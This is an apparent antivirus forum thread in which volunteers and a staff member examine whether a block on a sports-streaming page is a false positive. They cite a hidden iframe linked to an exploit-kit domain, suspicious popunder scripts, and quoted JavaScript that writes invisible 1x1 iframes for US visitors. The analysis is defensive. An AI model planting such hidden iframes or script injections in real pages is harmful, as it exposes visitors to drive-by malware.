Author Topic: False Positive? (Read 4677 times)

NVF · « **on:** October 06, 2015, 05:35:59 PM »

http://idimsports.eu/watch/137670/1/watch-espn.html#.VhPqI_lViko
Avast appears to be blocking the stream at the above site. The site itself comes up clean with VirusTotal.

Thanks.

Pondus · « **Reply #1 on:** October 06, 2015, 05:46:30 PM »

and what does the avast block message say?

Killmalware http://killmalware.com/idimsports.eu/watch/137670/1/watch-espn.html#.VhPqI_lViko

Unmaskparasites http://www.UnmaskParasites.com/security-report/?page=idimsports.eu/watch/137670/1/watch-espn.html

NVF · « **Reply #2 on:** October 06, 2015, 05:54:50 PM »

JS:ScriptIP-inf [Trj] is the infection it gives. I find this a little strange because this site is the same as an old one but under another name and I didn't have any problems then.

Thanks

Pondus · « **Reply #3 on:** October 06, 2015, 06:02:03 PM »

Quote

The site itself comes up clean with VirusTotal.

VirusTotal does not scan for infections, it is a blacklist check

html scan is clean ... seems Webshield does not like the hidden iframe as seen in the links above
https://www.virustotal.com/en/file/a12c48c9b70a85baeb2fce11726c98cc499207bdfe4f67b559fc30bf6ba22a1e/analysis/

the URL in the iFrame give this https://sitecheck.sucuri.net/results/s.cdnco.us/
Malware entry: MW:EXPLOITKIT:BLACKHOLE1 http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1.php

NVF · « **Reply #4 on:** October 06, 2015, 06:06:45 PM »

Quote from: Pondus on October 06, 2015, 06:02:03 PM

VirusTotal does not scan for infections, it is a blacklist check

There's a blacklist data base?

So is this a false positive by Avast! you think?

Pondus · « **Reply #5 on:** October 06, 2015, 06:12:20 PM »

Quote

There's a blacklist data base?

Many ... you see them listed in VT after a URL scan

Quote

So is this a false positive by Avast! you think?

report it here and ask https://support.avast.com -> avast virus lab

NVF · « **Reply #6 on:** October 06, 2015, 06:21:15 PM »

Quote from: Pondus on October 06, 2015, 06:12:20 PM

Many ... you see them listed in VT after a URL scan

But those sites blacklist URLs based on whether they've found infections so a VirusTotal scan is indirectly scanning for infections, no?

Quote from: Pondus on October 06, 2015, 06:12:20 PM

report it here and ask https://support.avast.com -> avast virus lab

I'll do that. Thanks.

Pondus · « **Reply #7 on:** October 06, 2015, 06:30:45 PM »

Quote

But those sites blacklist URLs based on whether they've found infections in them so a VirusTotal scan is indirectly scanning for infections, no?

yes / no ... if CNN.com got hacked and infected today it will take some time before it end up on a blacklist. It is usually those with bad IT staff that dont bother to fix issues.
And also consider what the issue is, there are many reasons for blacklisting, spam / phishing / infections ....

See hpHosts classifications as example http://hosts-file.net/?s=classifications

polonus · « **Reply #8 on:** October 06, 2015, 06:37:46 PM »

As starters DrWeb url checker gives your link as clean,
but I see the following alerts when specifically scanned.

Suspicious on iFrame check are:
Suspicious

-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90'
-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;c=7;d=9;w=300;h=250'
-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90'
-http://s.cdnco.us/vvdim.htm?/watch/137670/1/watch-espn.html'

On a javascript check this is being flagged:
Suspicious

%" colspan="2"><br><iframe src="-http://c4.zedo.com/jsc/c4/ff2.html?n=1838;s=1;d=14;w=728;h=90" frameborder=0 marginheight=0 marginwidth=0 sc

The following included scripts should be checked:
uspect - please check list for unknown includes

Suspicious Script:
-http://show.yeabble.com/yeabblepopfr.js
document.write(unescape('%3cscript type="text/javascript" * clean src="-http://creative.ad120m.com/matomy/scripts/popunder/popunder.js"%3e%3c/scr'+'i
Suspicious Script:
-http://show.yeabble.com/yeabblefooterfrfeed.js * Clean
document.write("<script src='\/\/t.mdn2015x1.com\/build\/9ccc9baf\/v1\/'><\/script>");
Suspicious Script:
-http://show.yeabble.com/matofrpopsec.js * clean
document.write(unescape('%3cscript type="text/javascript" src="-http://creative.admtpmp127.com/admtpmp127/scripts/popup/popup.js"%3e%3c/scr'+
with a very poor web rep: https://www.mywot.com/en/scorecard/creative.admtpmp127.com?utm_source=addon&utm_content=warn-viewsc

For starters I would block the following third party links, going to -magnetic.t.domdex.com, -pulsepoint-cm.p.veruta.com, pxgp2.adpredictive.com, -p.adpdx.com, -rdcdn.com, zl1.zeroredirect1.com and -ck.adohana.com
with a script or a request blocker.

See for alerts on website: https://urlquery.net/report.php?id=1444148063174
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fidimsports.eu%2Fwatch%2F137670%2F1%2Fwatch-espn.html%23.VhPqI_lViko
second link currently safe: http://adguard.com/en/adguard-report/show.yeabble.com/report.html
and this has been blocked in my browser: uMatrix has prevented the following page from loading:
htxp://s7.addthis.com/

This Dutch hosted website therefore is not without problems. I would be rather careful or shun it.

polonus (volunteer website security analyst and website error-hunter)

NVF · « **Reply #9 on:** October 06, 2015, 06:42:10 PM »

Okay. Thanks for the replies and data. Just find it odd to a degree that this site is now a potential problem when it was fine under another name, but their address did change so maybe other things did as well.

Thanks again!

polonus · « **Reply #10 on:** October 06, 2015, 07:02:08 PM »

Hi NVF,

It just depends how secure the browser is tweaked to avoid the adware and tracking dangers there and the occasional dropper With a good and decent script blocker and a decent adblocker your experience may not have differed that much from previous time.
Well you have been alerted to the fact that that sites like these use the visitors as a product in their pay model and that real content is only additional for them, always is and especially to-day "free comes at a price". As things stand now I would not go to that site, they have to clean up their act first.

greetings from the Netherlands,

polonus

HonzaZ · « **Reply #11 on:** October 07, 2015, 10:28:22 AM »

I do not think this is a False Positive - Avast complains about this piece of code:

Code: [Select]

if(document.location.hostname == "firstrowsports.uk.to"){window.location = "http://firstrowas.eu/sport/football.html";}
While this particular code seems clean, it cannot be said that redirections by JS are a neat way to do things. Why not use a 301 header, if you want to redirect?

Also, this alone would qualify for blocking the whole domain:

Code: [Select]

if(country2 == "US"){
document.write('<iframe src="http://www.vid4fun.net/v4f.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.trailernow.net/tn.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.everclips.net/evr.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.123trailers.net/1tr.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.govids.net/gov.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.hiclips.net/hic.php" height="1" width="1" border="0" scrolling="no"></iframe>');
document.write('<iframe src="http://www.ivids.net/ivd.php" height="1" width="1" border="0" scrolling="no"></iframe>');
}

Honza

Author Topic: False Positive? (Read 4677 times)

NVF

False Positive?

Pondus

Re: False Positive?

NVF

Re: False Positive?

Pondus

Re: False Positive?

NVF

Re: False Positive?

Pondus

Re: False Positive?

NVF

Re: False Positive?

Pondus

Re: False Positive?

polonus

Re: False Positive?

NVF

Re: False Positive?

polonus

Re: False Positive?

HonzaZ

Re: False Positive?